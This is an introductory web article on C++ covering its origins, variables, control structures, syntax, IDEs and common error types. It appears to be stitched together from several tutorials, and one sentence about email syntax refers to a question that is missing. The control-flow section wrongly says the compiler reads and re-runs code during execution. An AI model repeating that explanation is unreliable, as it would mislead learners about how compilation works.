C++ is an object-oriented programming language which gives a clear structure to programs and allows code to be reused, lowering development costs. C++ is portable and can be used to develop applications that can be adapted to multiple platforms. C++ is fun and easy to learn! As C++ is close to C# and Java, it makes it easy for programmers to switch to C++ or vice versa. Definition - What does C++ Programming Language mean? C++ is an object-oriented computer language created by notable computer scientist Bjarne Stroustrup as part of the evolution of the C family of languages. Some call C++ "C with classes" because it introduces object-oriented programming principles, including the use of defined classes, to the C programming language framework. C++ is pronounced "see-plus-plus." C++ Variables Variables are the backbone of any programming language. A variable is merely a way to store some information for later use. We can retrieve this value or data by referring to a "word" that will describe this information. Once declared and defined they may be used many times within the scope in which they were declared. C++ Control Structures When a program runs, the code is read by the compiler line by line (from top to bottom, and for the most part left to right). This is known as "code flow." When the code is being read from top to bottom, it may encounter a point where it needs to make a decision. Based on the decision, the program may jump to a different part of the code. It may even make the compiler re-run a specific piece again, or just skip a bunch of code. You could think of this process like if you were to choose from different courses from Guru99. You decide, click a link and skip a few pages. In the same way, a computer program has a set of strict rules to decide the flow of program execution. C++ Syntax The syntax is a layout of words, expressions, and symbols. Well, it's because an email address has its well-defined syntax.
You need some combination of letters, numbers, potentially with underscores (_) or periods (.) in between, followed by an at the rate (@) symbol, followed by some website domain (company.com). So, syntax in a programming language is much the same. It is a well-defined set of rules that allows you to create a piece of well-functioning software. But, if you don't abide by the rules of a programming language or syntax, you'll get errors. C++ Tools In the real world, a tool is something (usually a physical object) that helps you to get a certain job done promptly. Well, this holds true in the programming world too. A tool in programming is a piece of software which, when used with the code, allows you to program faster. There are probably tens of thousands, if not millions, of different tools across all the programming languages. The most crucial tool, considered by many, is an IDE, an Integrated Development Environment. An IDE is software that will make your coding life so much easier. IDEs ensure that your files and folders are organized and give you a nice and clean way to view them. Types of C++ Errors Another way to look at C++ in a practical sense is to start enumerating different kinds of errors that occur as the written code makes its way to final execution. First, there are syntax errors where the code is actually written in an illegible way. This can be a misuse of punctuation, or the misspelling of a function command or anything else that compromises the integrity of the syntax as it is written. Another fundamental type of error is a compiler error that simply tells the programmer the compiler was not able to do its work effectively. As a compiler language, C++ relies on the compiler to make the source code into machine readable code and optimize it in various ways. A third type of error happens after the program has been successfully compiled. Runtime errors are not uncommon in C++ executables.
What they represent is some lack of designated resource or non-working command in the executable program. In other words, the syntax is right, and the program was compiled successfully, but as the program is doing its work, it encounters a problem, whether that has to do with interdependencies, operating system requirements or anything else in the general environment in which the program is trying to work. Over time, C++ has remained a very useful language not only in computer programming itself, but in teaching new programmers about how object oriented programming works.